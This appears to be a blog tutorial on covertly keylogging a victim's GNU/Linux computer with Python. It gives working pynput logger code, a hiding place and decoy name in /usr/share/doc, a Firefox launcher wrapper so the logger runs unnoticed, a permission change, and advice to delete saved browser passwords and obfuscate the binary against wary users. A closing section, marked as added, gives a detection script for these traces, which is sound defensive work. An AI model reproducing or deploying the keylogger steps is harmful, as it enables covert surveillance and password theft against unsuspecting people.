A simple way to steal passwords is to install a keylogger on the victim's computer. I am going to show how to do this on GNU/Linux using the Python programming language.
The first thing to do is to obtain superuser permissions. If the computer is managed by us, we already know the password. If not, we can get superuser access from GRUB. With the necessary permissions, we are free to install the keylogger.
First of all, the pynput library must be installed by executing:
sudo pip install pynput
Next, we need to write the keylogger. This is the code we will use:
#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging

log_dir = "/usr/share/doc/python3/"
logging.basicConfig(filename=(log_dir + "log"), \
    level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()
The keylog is stored in log_dir. In this case, I have specified the GNU/Linux Python 3 documentation folder. The keylogger can also be stored in the same directory, perhaps with the name compile_docs.py or something similar to avoid attracting attention. Ideally, choose a folder that the victim is not going to enter to prevent them from realising what we are doing.
The last step would be to run the program every time the computer is turned on or a program is started without the victim noticing. If, for example, we want to start the keylogger every time the user opens Firefox, we can modify the Firefox command. We can rename firefox to firefox.bin and create the following file called firefox:
python3 /usr/share/doc/python3/compile_docs.py &
exec firefox.bin "$@"
To find out which firefox file is executed when you click on its icon, go to /usr/share/applications, enter the file firefox.desktop (or firefox-esr.desktop) and look for the line starting with Exec.
Next, we should give write permissions for users other than root to the directory where we are going to store the typing log:
sudo chmod o+w /usr/share/doc/python3
Finally, we should wait for the victim to use the computer to get their passwords or any information they type that we want to obtain. The keylog will be stored in the file /usr/share/doc/python3/log. But be careful: the file can take up a lot of space if you don't delete it from time to time, so it would be best to uninstall the keylogger after you have obtained the information you need. Another option is to configure it to send the keylog information by email instead of saving it to a file, which would not take up much space on the victim's computer, but that method requires the use of an email.
If the victim has the passwords saved in the browser and does not need to re-type them, we can delete the password file so that the victim is forced to re-enter them. All in all, with ingenuity we can get a lot of information, especially if we apply this method against less advanced users, who will not be very suspicious. For more advanced users, it might be best to compile the compile_docs.py program with Nuitka, like I show in the following article.
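The changes described above leave traces that can be checked for on a machine. The following is an added example, not code from the original article: it flags launchers named in .desktop Exec lines that are scripts sitting next to a `<name>.bin` copy, and directories under a documentation tree that other users can write to. The function names are made up for this example, and a hit is a heuristic to review, since some distributions ship legitimate wrapper scripts.

```python
import os
import shlex
import shutil
import stat
from pathlib import Path

def exec_commands(apps_dir):
    """Yield (desktop file name, first word of each Exec= line)."""
    for desktop in sorted(Path(apps_dir).glob("*.desktop")):
        for line in desktop.read_text(errors="replace").splitlines():
            if line.startswith("Exec="):
                argv = shlex.split(line[len("Exec="):])
                if argv:
                    yield desktop.name, argv[0]

def is_elf(path):
    """True if the file starts with the ELF magic bytes."""
    with open(path, "rb") as fh:
        return fh.read(4) == b"\x7fELF"

def wrapped_launchers(apps_dir, search_path=None):
    """Flag launchers that are non-ELF files with a '<name>.bin' sibling."""
    findings, seen = [], set()
    for desktop, cmd in exec_commands(apps_dir):
        target = shutil.which(cmd, path=search_path)
        if not target:
            continue
        real = os.path.realpath(target)
        if real in seen:
            continue
        seen.add(real)
        if os.path.isfile(real + ".bin") and not is_elf(real):
            findings.append((desktop, real))
    return findings

def other_writable_dirs(root):
    """Return directories under root with the o+w permission bit set."""
    hits = []
    for dirpath, _dirs, _files in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            hits.append(dirpath)
    return hits

if __name__ == "__main__":
    for desktop, path in wrapped_launchers("/usr/share/applications"):
        print(f"review: {desktop} starts script {path}; {path}.bin also exists")
    for path in other_writable_dirs("/usr/share/doc"):
        print(f"review: {path} is writable by other users")
```

A package integrity check with the distribution's own tooling (for example `dpkg --verify` or `rpm -Va`) covers the same ground from the package database side.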